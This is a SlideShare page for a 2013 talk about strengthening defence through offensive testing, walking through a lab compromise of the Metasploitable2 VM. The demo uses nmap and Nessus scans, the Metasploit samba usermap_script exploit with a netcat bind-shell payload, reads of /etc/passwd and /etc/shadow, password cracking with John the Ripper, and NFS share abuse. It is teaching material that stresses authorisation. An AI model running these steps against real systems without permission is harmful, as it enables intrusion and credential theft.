SlideShare a Scribd company logo

The best defense is a good offense (April 2013 Presentation to Atlantic HTCIA chapter)

•
•
Andrew Kozma
Andrew Kozma
Technology
1 of 36
Download to read offline
“Improving your defensive security posture with offensive security strategies” Andrew Kozma HTCIA, Atlantic Chapter Meeting April 18th, 2013
A bit about me…  Infosec professional working in healthcare  Co-founder of AtlSecCon  Midnight ethical hacker  A perpetual student  Security researcher/philosopher  Fan of the blues (Secretly want to learn how to play the harmonica)
Offensive Security  “How much can you know about yourself if you've never been in a fight?” ~Chuck Palahniuk, Fight Club  Hacking our own infrastructure to improve defensive security measures and processes  Tools – Kali Linux, a security distro maintained by Offensive- Security with all the tools required to test security, it’s free and always will be  Tactics – The application of tools  Strategy – The big picture, all the pieces working together to achieve an ultimate goal
Creating a practice environment  “The first rule of fight club is, you don't talk about fight club.” ~Chuck Palahniuk, Fight Club  The goal - a controlled environment where it is safe to practice offensive security techniques  There are many vulnerable distributions that can serve as targets to help build skills (@g0tmi1k’s www.vulnhub.com)  With proper planning and authorization along with an understanding of the risks you can test production infrastructure  Virtualization is a beautiful thing!
Demo (metasploitable2) ď‚ž NMAP Scan ď‚— Identify OS, Services and open ports ď‚ž Nessus Vuln Scan ď‚— Run a scan to find vulnerabilities that can potentially be exploited ď‚ž Metasploit console ď‚— Import the info ď‚— Exploit the target ď‚ž Post exploitation ď‚— Crack passwords with john ď‚— PWN the box
Demo (nmap) • Scanning with nmap -O OS Detection -sV Service Version -sC NSE Scripts -oX Output in xml format --stylesheet nmap.xsl --open --reason • Copying the stylesheet to our working directory • Displaying the nmap scan in Iceweasel (Kali-Linux Browser)
Demo (nmap output)
Demo (Nessus) • Nessus Vulnerability Scanner • Not native to Kali-Linux • Download and install • dpkg –i “filename” • Register for Home feed (free) • Connect to Local host port 8834 • Login and select new scan
Demo (Nessus) • Launch the scan • Nessus indicates the scan progress • A summary is displayed once the scan is complete
Demo (Nessus) • Export and save the report
Demo (Nessus Output)
Demo (metasploit) • Opening the Metasploit Framework Console • Enter the command “msfconsole” • Importing our nmap scan results into the metasploit database • Enter the command “db_import /path to the nmap scan”
Demo (metasploit) • We can validate the db_import by entering the command “hosts” at the msf prompt • We can also validate the services imported for that host from nmap by entering the command “services” at an msf prompt.
Demo (metasploit) • Import the nessus scan into metasploit with command “db_import /path to the file” • Now that it is imported into metasploit we can view the vulnerabilities that nessus detected with the command “vulns”
Demo (metasploit) • For this demo we are going to exploit samba • Load the exploit in msf with the command: “use exploit/multi/samba/usermap_script” • Once the exploit is loaded we can learn more about its functions via the command “info”
Demo (metasploit) • The command: “show options” indicates any variables that require a value to be set • For this exploit a Remote Host is required to be identified. We will use the command: “set RHOST target.ip.address” • A payload that will be delivered to the target is required we issue the command “set PAYLOAD cmd/unix/bind/netcat”
Demo (metasploit) • The command “show options” now indicates the variables for RHOST and PAYLOAD that we previously defined
Demo (metasploit) • We attack the target via the command “exploit” • Booyah! Shell access to the target! • We have root level access to the target and interact via this shell • Let’s display the target systems user accounts via the command “cat /etc/passwd” • We are going to select the data displayed and copy it to a .txt file
Demo (metasploit) • Now we need to grab the hashes associated with the user accounts we just viewed • This can be done by displaying the hashes via the command “cat /etc/shadow” • Once again we will be selecting the information displayed and will be copying it to a .txt file
Demo (Usernames and Hashes)
Demo (John The Ripper) • We are going to use John The Ripper to crack the passwords for the user accounts • For John to crack them we have to combine the usernames and their hash into a format that John can understand • We combine both files to a single one for John to crack with the command: “unshadow /path/passwd.txt /path/shadow.txt > unshadowed.txt” • We now have a file with usernames and hashes that John can use
Demo (John The Ripper) • We are going to take a quick peek at the contents of the new file • To do this we change to directory the file resides in “cd HTCIA” • We can display the contents of this file in the terminal with the command “cat unshadowed.txt”
Demo (John The Ripper) • To start cracking the password with John we issue the command: “john /path to the filename.txt” • John has loaded the hashes and has successfully cracked some of the passwords • Previously cracked passwords can be viewed with the command: “john –show /Path to the file.txt”
Demo (Post Exploitation) • Using our new creds to SSH to the exploited workstation • To connect via SSH we use the command: “ssh –l msfadmin Target.IP.Address” • Now we have a terminal session vs a shell • In the real world we could continue to install backdoors, steal data, pivot to scan for other hosts
Demo (Post Exploitation) • Lets review other services so that we can maintain a persistent presence on the compromised workstation • Hmmm NFS services are running on the target…
Demo (Post Exploitation) • Lets take a quick look at the NFS share available on the target • Uh oh… everything is shared • We are going to create a temp directory and then mount the share in it • Lets display the filesystem to see the NFS share mounted in temp
Demo (Post Exploitation) • Looking into the share that we mounted… • We already know we can copy the contents of the passwd and shadow files again
Demo (Post Exploitation) • Remember our Nessus output • Collect as much information as possible during the information gathering phase… • Sometimes you get lucky! The VNC server password was identified in the scan by Nessus
Breaking things to make them better  “At the time, my life just seemed too complete, and maybe we have to break everything to make something better out of ourselves.” ~Chuck Palahniuk, Fight Club  When you start looking at production systems it is important to have a demonstrated, repeatable process that has buy in from management  Document your findings indicating the threat, the likelihood of occurrence and the impact to the business  Use this information to build business cases for investment in security solutions  When you start looking at the production environment… there will be blood….
Advanced Persistent Response  “On a long enough time line, the survival rate for everyone drops to zero.” ~Chuck Palahniuk, Fight Club  Understanding trends and current threats  Filling in the gaps with security (Technology and process)  Creating and implementing a security model that meets organizational needs
Incident Response  "With a gun barrel between your teeth, you speak only in vowels.“ ~Chuck Palahniuk, Fight Club  Preparation  Have a plan, know who to call and when  Identification  Determination of whether or not there was an incident  Containment  Protecting other critical systems “stop the bleeding”  Eradication  Addressing the vulnerabilities that were exploited  Recovery  Returning to operational status  Follow up  Lessons learned, prevent future incidents of the same nature
Parting thoughts ď‚ž Do you still think the best defense is a good offense? ď‚ž IMHO ~ A good offense helps to make a great defense! (with proper planning and execution)
References ď‚ž Jeremy Druin @webpwnized has a great tutorial online going into more detail: http://www.youtube.com/watch?v=0fbBwGAuINw ď‚ž @netbiosx has a tutorial available online regarding NFS and metasploitable2: http://pentestlab.wordpress.com/2013/01/20/nfs-misconfiguration/ ď‚ž Nessus software and home feed licensing can be found on their site: http://www.tenable.com/ ď‚ž Kali-Linux can be obtained at www.kali.org and is maintained by Offensive-Security ď‚ž Metasploitable2 is maintained by Rapid7 and is available for download from: https://community.rapid7.com/docs/DOC-1875 ď‚ž Why stop here! There are many other distros to help expand your skillset, check out @g0tmi1k and his website at http://vulnhub.com/
Thank you ď‚ž Twitter handle - @k0z1can ď‚ž ca.linkedin.com/in/andrewkozma/

Recommended

Vulnerability, exploit to metasploit
Vulnerability, exploit to metasploitVulnerability, exploit to metasploit
Vulnerability, exploit to metasploitTiago Henriques
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassGeorgia Weidman
 
Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web WorkshopDennis Maldonado
 
Introduction to Dynamic Malware Analysis ...Or am I "Cuckoo for Malware?"
Introduction to Dynamic Malware Analysis ...Or am I "Cuckoo for Malware?"Introduction to Dynamic Malware Analysis ...Or am I "Cuckoo for Malware?"
Introduction to Dynamic Malware Analysis ...Or am I "Cuckoo for Malware?"Lane Huff
 
About linux-english
About linux-englishAbout linux-english
About linux-englishShota Ito
 
CheckPlease: Payload-Agnostic Targeted Malware
CheckPlease: Payload-Agnostic Targeted MalwareCheckPlease: Payload-Agnostic Targeted Malware
CheckPlease: Payload-Agnostic Targeted MalwareBrandon Arvanaghi
 
BSides_Charm2015_Info sec hunters_gathers
BSides_Charm2015_Info sec hunters_gathersBSides_Charm2015_Info sec hunters_gathers
BSides_Charm2015_Info sec hunters_gathersAndrew McNicol
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For BeginnersRamnath Shenoy
 

Recommended

Vulnerability, exploit to metasploit
Vulnerability, exploit to metasploitVulnerability, exploit to metasploit
Vulnerability, exploit to metasploitTiago Henriques
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassGeorgia Weidman
 
Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web WorkshopDennis Maldonado
 
Introduction to Dynamic Malware Analysis ...Or am I "Cuckoo for Malware?"
Introduction to Dynamic Malware Analysis ...Or am I "Cuckoo for Malware?"Introduction to Dynamic Malware Analysis ...Or am I "Cuckoo for Malware?"
Introduction to Dynamic Malware Analysis ...Or am I "Cuckoo for Malware?"Lane Huff
 
About linux-english
About linux-englishAbout linux-english
About linux-englishShota Ito
 
CheckPlease: Payload-Agnostic Targeted Malware
CheckPlease: Payload-Agnostic Targeted MalwareCheckPlease: Payload-Agnostic Targeted Malware
CheckPlease: Payload-Agnostic Targeted MalwareBrandon Arvanaghi
 
BSides_Charm2015_Info sec hunters_gathers
BSides_Charm2015_Info sec hunters_gathersBSides_Charm2015_Info sec hunters_gathers
BSides_Charm2015_Info sec hunters_gathersAndrew McNicol
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For BeginnersRamnath Shenoy
 
Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24Andy Robbins
 
Native or External?
Native or External?Native or External?
Native or External?ESUG
 
Client side exploits
Client side exploitsClient side exploits
Client side exploitsnickyt8
 
The Supporting Role of Antivirus Evasion while Persisting
The Supporting Role of Antivirus Evasion while PersistingThe Supporting Role of Antivirus Evasion while Persisting
The Supporting Role of Antivirus Evasion while PersistingCTruncer
 
The State of the Veil Framework
The State of the Veil FrameworkThe State of the Veil Framework
The State of the Veil FrameworkVeilFramework
 
Ever Present Persistence - Established Footholds Seen in the Wild
Ever Present Persistence - Established Footholds Seen in the WildEver Present Persistence - Established Footholds Seen in the Wild
Ever Present Persistence - Established Footholds Seen in the WildCTruncer
 
Tcpdump hunter
Tcpdump hunterTcpdump hunter
Tcpdump hunterAndrew McNicol
 
Teensy Programming for Everyone
Teensy Programming for EveryoneTeensy Programming for Everyone
Teensy Programming for EveryoneNikhil Mittal
 
Veil-Ordnance
Veil-OrdnanceVeil-Ordnance
Veil-OrdnanceVeilFramework
 
Metasploit Humla for Beginner
Metasploit Humla for BeginnerMetasploit Humla for Beginner
Metasploit Humla for Beginnern|u - The Open Security Community
 
AntiVirus Evasion Reconstructed - Veil 3.0
AntiVirus Evasion Reconstructed - Veil 3.0AntiVirus Evasion Reconstructed - Veil 3.0
AntiVirus Evasion Reconstructed - Veil 3.0CTruncer
 
Shmoocon Epilogue 2013 - Ruining security models with SSH
Shmoocon Epilogue 2013 - Ruining security models with SSHShmoocon Epilogue 2013 - Ruining security models with SSH
Shmoocon Epilogue 2013 - Ruining security models with SSHAndrew Morris
 
Memory Corruption: from sandbox to SMM
Memory Corruption: from sandbox to SMMMemory Corruption: from sandbox to SMM
Memory Corruption: from sandbox to SMMPositive Hack Days
 
Purpose Driven Hunt (DerbyCon 2017)
Purpose Driven Hunt (DerbyCon 2017)Purpose Driven Hunt (DerbyCon 2017)
Purpose Driven Hunt (DerbyCon 2017)Jared Atkinson
 
Passive Intelligence Gathering and Analytics - It's All Just Metadata!
Passive Intelligence Gathering and Analytics - It's All Just Metadata!Passive Intelligence Gathering and Analytics - It's All Just Metadata!
Passive Intelligence Gathering and Analytics - It's All Just Metadata!CTruncer
 
CheckPlease - Payload-Agnostic Implant Security
CheckPlease - Payload-Agnostic Implant SecurityCheckPlease - Payload-Agnostic Implant Security
CheckPlease - Payload-Agnostic Implant SecurityBrandon Arvanaghi
 
Introduction to Malware Analysis
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware AnalysisAndrew McNicol
 
Jwt == insecurity?
Jwt == insecurity?Jwt == insecurity?
Jwt == insecurity?snyff
 
Pen-Testing with Metasploit
Pen-Testing with MetasploitPen-Testing with Metasploit
Pen-Testing with MetasploitMohammed Danish Amber
 
Bringing Down the House - How One Python Script Ruled Over AntiVirus
Bringing Down the House - How One Python Script Ruled Over AntiVirusBringing Down the House - How One Python Script Ruled Over AntiVirus
Bringing Down the House - How One Python Script Ruled Over AntiVirusCTruncer
 
Marketing warefare
Marketing warefareMarketing warefare
Marketing warefareVaibhav Raj
 
Marketing and the warfare metaphor
Marketing and the warfare metaphorMarketing and the warfare metaphor
Marketing and the warfare metaphorAndrew Hirst
 

More Related Content

What's hot

Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24Andy Robbins
 
Native or External?
Native or External?Native or External?
Native or External?ESUG
 
Client side exploits
Client side exploitsClient side exploits
Client side exploitsnickyt8
 
The Supporting Role of Antivirus Evasion while Persisting
The Supporting Role of Antivirus Evasion while PersistingThe Supporting Role of Antivirus Evasion while Persisting
The Supporting Role of Antivirus Evasion while PersistingCTruncer
 
The State of the Veil Framework
The State of the Veil FrameworkThe State of the Veil Framework
The State of the Veil FrameworkVeilFramework
 
Ever Present Persistence - Established Footholds Seen in the Wild
Ever Present Persistence - Established Footholds Seen in the WildEver Present Persistence - Established Footholds Seen in the Wild
Ever Present Persistence - Established Footholds Seen in the WildCTruncer
 
Teensy Programming for Everyone
Teensy Programming for EveryoneTeensy Programming for Everyone
Teensy Programming for EveryoneNikhil Mittal
 
AntiVirus Evasion Reconstructed - Veil 3.0
AntiVirus Evasion Reconstructed - Veil 3.0AntiVirus Evasion Reconstructed - Veil 3.0
AntiVirus Evasion Reconstructed - Veil 3.0CTruncer
 
Shmoocon Epilogue 2013 - Ruining security models with SSH
Shmoocon Epilogue 2013 - Ruining security models with SSHShmoocon Epilogue 2013 - Ruining security models with SSH
Shmoocon Epilogue 2013 - Ruining security models with SSHAndrew Morris
 
Memory Corruption: from sandbox to SMM
Memory Corruption: from sandbox to SMMMemory Corruption: from sandbox to SMM
Memory Corruption: from sandbox to SMMPositive Hack Days
 
Purpose Driven Hunt (DerbyCon 2017)
Purpose Driven Hunt (DerbyCon 2017)Purpose Driven Hunt (DerbyCon 2017)
Purpose Driven Hunt (DerbyCon 2017)Jared Atkinson
 
Passive Intelligence Gathering and Analytics - It's All Just Metadata!
Passive Intelligence Gathering and Analytics - It's All Just Metadata!Passive Intelligence Gathering and Analytics - It's All Just Metadata!
Passive Intelligence Gathering and Analytics - It's All Just Metadata!CTruncer
 
CheckPlease - Payload-Agnostic Implant Security
CheckPlease - Payload-Agnostic Implant SecurityCheckPlease - Payload-Agnostic Implant Security
CheckPlease - Payload-Agnostic Implant SecurityBrandon Arvanaghi
 
Introduction to Malware Analysis
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware AnalysisAndrew McNicol
 
Jwt == insecurity?
Jwt == insecurity?Jwt == insecurity?
Jwt == insecurity?snyff
 
Bringing Down the House - How One Python Script Ruled Over AntiVirus
Bringing Down the House - How One Python Script Ruled Over AntiVirusBringing Down the House - How One Python Script Ruled Over AntiVirus
Bringing Down the House - How One Python Script Ruled Over AntiVirusCTruncer
 

What's hot (20)

Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24
 
Native or External?
Native or External?Native or External?
Native or External?
 
Client side exploits
Client side exploitsClient side exploits
Client side exploits
 
The Supporting Role of Antivirus Evasion while Persisting
The Supporting Role of Antivirus Evasion while PersistingThe Supporting Role of Antivirus Evasion while Persisting
The Supporting Role of Antivirus Evasion while Persisting
 
The State of the Veil Framework
The State of the Veil FrameworkThe State of the Veil Framework
The State of the Veil Framework
 
Ever Present Persistence - Established Footholds Seen in the Wild
Ever Present Persistence - Established Footholds Seen in the WildEver Present Persistence - Established Footholds Seen in the Wild
Ever Present Persistence - Established Footholds Seen in the Wild
 
Tcpdump hunter
Tcpdump hunterTcpdump hunter
Tcpdump hunter
 
Teensy Programming for Everyone
Teensy Programming for EveryoneTeensy Programming for Everyone
Teensy Programming for Everyone
 
Veil-Ordnance
Veil-OrdnanceVeil-Ordnance
Veil-Ordnance
 
Metasploit Humla for Beginner
Metasploit Humla for BeginnerMetasploit Humla for Beginner
Metasploit Humla for Beginner
 
AntiVirus Evasion Reconstructed - Veil 3.0
AntiVirus Evasion Reconstructed - Veil 3.0AntiVirus Evasion Reconstructed - Veil 3.0
AntiVirus Evasion Reconstructed - Veil 3.0
 
Shmoocon Epilogue 2013 - Ruining security models with SSH
Shmoocon Epilogue 2013 - Ruining security models with SSHShmoocon Epilogue 2013 - Ruining security models with SSH
Shmoocon Epilogue 2013 - Ruining security models with SSH
 
Memory Corruption: from sandbox to SMM
Memory Corruption: from sandbox to SMMMemory Corruption: from sandbox to SMM
Memory Corruption: from sandbox to SMM
 
Purpose Driven Hunt (DerbyCon 2017)
Purpose Driven Hunt (DerbyCon 2017)Purpose Driven Hunt (DerbyCon 2017)
Purpose Driven Hunt (DerbyCon 2017)
 
Passive Intelligence Gathering and Analytics - It's All Just Metadata!
Passive Intelligence Gathering and Analytics - It's All Just Metadata!Passive Intelligence Gathering and Analytics - It's All Just Metadata!
Passive Intelligence Gathering and Analytics - It's All Just Metadata!
 
CheckPlease - Payload-Agnostic Implant Security
CheckPlease - Payload-Agnostic Implant SecurityCheckPlease - Payload-Agnostic Implant Security
CheckPlease - Payload-Agnostic Implant Security
 
Introduction to Malware Analysis
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware Analysis
 
Jwt == insecurity?
Jwt == insecurity?Jwt == insecurity?
Jwt == insecurity?
 
Pen-Testing with Metasploit
Pen-Testing with MetasploitPen-Testing with Metasploit
Pen-Testing with Metasploit
 
Bringing Down the House - How One Python Script Ruled Over AntiVirus
Bringing Down the House - How One Python Script Ruled Over AntiVirusBringing Down the House - How One Python Script Ruled Over AntiVirus
Bringing Down the House - How One Python Script Ruled Over AntiVirus
 

Viewers also liked

Marketing warefare
Marketing warefareMarketing warefare
Marketing warefareVaibhav Raj
 
Marketing and the warfare metaphor
Marketing and the warfare metaphorMarketing and the warfare metaphor
Marketing and the warfare metaphorAndrew Hirst
 
Warfare Strategies
Warfare StrategiesWarfare Strategies
Warfare StrategiesKaminee Iresha
 
Marketing warfare
Marketing warfareMarketing warfare
Marketing warfareSantosh JK
 
marketing_warfare summary/ review
marketing_warfare summary/ reviewmarketing_warfare summary/ review
marketing_warfare summary/ reviewAkshay Raghav
 

Viewers also liked (8)

Marketing warefare
Marketing warefareMarketing warefare
Marketing warefare
 
Marketing and the warfare metaphor
Marketing and the warfare metaphorMarketing and the warfare metaphor
Marketing and the warfare metaphor
 
Marketing warfare
Marketing warfareMarketing warfare
Marketing warfare
 
Warfare Strategies
Warfare StrategiesWarfare Strategies
Warfare Strategies
 
Marketing Warfare
Marketing WarfareMarketing Warfare
Marketing Warfare
 
Marketing warfare
Marketing warfareMarketing warfare
Marketing warfare
 
Discriminant analysis
Discriminant analysisDiscriminant analysis
Discriminant analysis
 
marketing_warfare summary/ review
marketing_warfare summary/ reviewmarketing_warfare summary/ review
marketing_warfare summary/ review
 

Similar to The best defense is a good offense (April 2013 Presentation to Atlantic HTCIA chapter)

First Responders Course - Session 7 - Incident Scope Assessment [2004]
First Responders Course - Session 7 - Incident Scope Assessment [2004]First Responders Course - Session 7 - Incident Scope Assessment [2004]
First Responders Course - Session 7 - Incident Scope Assessment [2004]Phil Huggins FBCS CITP
 
REMnux tutorial-2: Extraction and decoding of Artifacts
REMnux tutorial-2: Extraction and decoding of ArtifactsREMnux tutorial-2: Extraction and decoding of Artifacts
REMnux tutorial-2: Extraction and decoding of ArtifactsRhydham Joshi
 
PowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue KidPowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue KidMatthew Johnson
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploitdevilback
 
Threats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxThreats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxAmitesh Bharti
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, PowershellRoo7break
 
DevSecCon Tel Aviv 2018 - Integrated Security Testing by Morgan Roman
DevSecCon Tel Aviv 2018 - Integrated Security Testing by Morgan RomanDevSecCon Tel Aviv 2018 - Integrated Security Testing by Morgan Roman
DevSecCon Tel Aviv 2018 - Integrated Security Testing by Morgan RomanDevSecCon
 
Creating Havoc using Human Interface Device
Creating Havoc using Human Interface DeviceCreating Havoc using Human Interface Device
Creating Havoc using Human Interface DevicePositive Hack Days
 
Lions, Tigers and Deers: What building zoos can teach us about securing micro...
Lions, Tigers and Deers: What building zoos can teach us about securing micro...Lions, Tigers and Deers: What building zoos can teach us about securing micro...
Lions, Tigers and Deers: What building zoos can teach us about securing micro...Sysdig
 
ISACA Ethical Hacking Presentation 10/2011
ISACA Ethical Hacking Presentation 10/2011ISACA Ethical Hacking Presentation 10/2011
ISACA Ethical Hacking Presentation 10/2011Xavier Mertens
 
ETCSS: Into the Mind of a Hacker
ETCSS: Into the Mind of a HackerETCSS: Into the Mind of a Hacker
ETCSS: Into the Mind of a HackerRob Gillen
 
Advanced Malware Analysis Training Session 6 - Malware Sandbox Analysis
Advanced Malware Analysis Training Session 6 - Malware Sandbox AnalysisAdvanced Malware Analysis Training Session 6 - Malware Sandbox Analysis
Advanced Malware Analysis Training Session 6 - Malware Sandbox Analysissecurityxploded
 
Practical Chaos Engineering
Practical Chaos EngineeringPractical Chaos Engineering
Practical Chaos EngineeringSIGHUP
 
Dumping and Cracking SAM Hashes to Extract Plaintext Passwords
Dumping and Cracking SAM Hashes to Extract Plaintext PasswordsDumping and Cracking SAM Hashes to Extract Plaintext Passwords
Dumping and Cracking SAM Hashes to Extract Plaintext PasswordsVishal Kumar
 
Your First Guide to "secure Linux"
Your First Guide to "secure Linux"Your First Guide to "secure Linux"
Your First Guide to "secure Linux"Toshiharu Harada, Ph.D
 
6.Temp & Rand
6.Temp & Rand6.Temp & Rand
6.Temp & Randphanleson
 
Bc0056 unix operating system
Bc0056 unix operating systemBc0056 unix operating system
Bc0056 unix operating systemsmumbahelp
 
Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...Stefano Maccaglia
 
The Golden Rules - Detecting more with RSA Security Analytics
The Golden Rules - Detecting more with RSA Security AnalyticsThe Golden Rules - Detecting more with RSA Security Analytics
The Golden Rules - Detecting more with RSA Security AnalyticsDemetrio Milea
 
Malicious File for Exploiting Forensic Software
Malicious File for Exploiting Forensic SoftwareMalicious File for Exploiting Forensic Software
Malicious File for Exploiting Forensic SoftwareTakahiro Haruyama
 

Similar to The best defense is a good offense (April 2013 Presentation to Atlantic HTCIA chapter) (20)

First Responders Course - Session 7 - Incident Scope Assessment [2004]
First Responders Course - Session 7 - Incident Scope Assessment [2004]First Responders Course - Session 7 - Incident Scope Assessment [2004]
First Responders Course - Session 7 - Incident Scope Assessment [2004]
 
REMnux tutorial-2: Extraction and decoding of Artifacts
REMnux tutorial-2: Extraction and decoding of ArtifactsREMnux tutorial-2: Extraction and decoding of Artifacts
REMnux tutorial-2: Extraction and decoding of Artifacts
 
PowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue KidPowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue Kid
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploit
 
Threats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxThreats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in Linux
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, Powershell
 
DevSecCon Tel Aviv 2018 - Integrated Security Testing by Morgan Roman
DevSecCon Tel Aviv 2018 - Integrated Security Testing by Morgan RomanDevSecCon Tel Aviv 2018 - Integrated Security Testing by Morgan Roman
DevSecCon Tel Aviv 2018 - Integrated Security Testing by Morgan Roman
 
Creating Havoc using Human Interface Device
Creating Havoc using Human Interface DeviceCreating Havoc using Human Interface Device
Creating Havoc using Human Interface Device
 
Lions, Tigers and Deers: What building zoos can teach us about securing micro...
Lions, Tigers and Deers: What building zoos can teach us about securing micro...Lions, Tigers and Deers: What building zoos can teach us about securing micro...
Lions, Tigers and Deers: What building zoos can teach us about securing micro...
 
ISACA Ethical Hacking Presentation 10/2011
ISACA Ethical Hacking Presentation 10/2011ISACA Ethical Hacking Presentation 10/2011
ISACA Ethical Hacking Presentation 10/2011
 
ETCSS: Into the Mind of a Hacker
ETCSS: Into the Mind of a HackerETCSS: Into the Mind of a Hacker
ETCSS: Into the Mind of a Hacker
 
Advanced Malware Analysis Training Session 6 - Malware Sandbox Analysis
Advanced Malware Analysis Training Session 6 - Malware Sandbox AnalysisAdvanced Malware Analysis Training Session 6 - Malware Sandbox Analysis
Advanced Malware Analysis Training Session 6 - Malware Sandbox Analysis
 
Practical Chaos Engineering
Practical Chaos EngineeringPractical Chaos Engineering
Practical Chaos Engineering
 
Dumping and Cracking SAM Hashes to Extract Plaintext Passwords
Dumping and Cracking SAM Hashes to Extract Plaintext PasswordsDumping and Cracking SAM Hashes to Extract Plaintext Passwords
Dumping and Cracking SAM Hashes to Extract Plaintext Passwords
 
Your First Guide to "secure Linux"
Your First Guide to "secure Linux"Your First Guide to "secure Linux"
Your First Guide to "secure Linux"
 
6.Temp & Rand
6.Temp & Rand6.Temp & Rand
6.Temp & Rand
 
Bc0056 unix operating system
Bc0056 unix operating systemBc0056 unix operating system
Bc0056 unix operating system
 
Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...
 
The Golden Rules - Detecting more with RSA Security Analytics
The Golden Rules - Detecting more with RSA Security AnalyticsThe Golden Rules - Detecting more with RSA Security Analytics
The Golden Rules - Detecting more with RSA Security Analytics
 
Malicious File for Exploiting Forensic Software
Malicious File for Exploiting Forensic SoftwareMalicious File for Exploiting Forensic Software
Malicious File for Exploiting Forensic Software
 

Recently uploaded

Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxOnBoard
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...gurkirankumar98700
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGSujit Pal
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
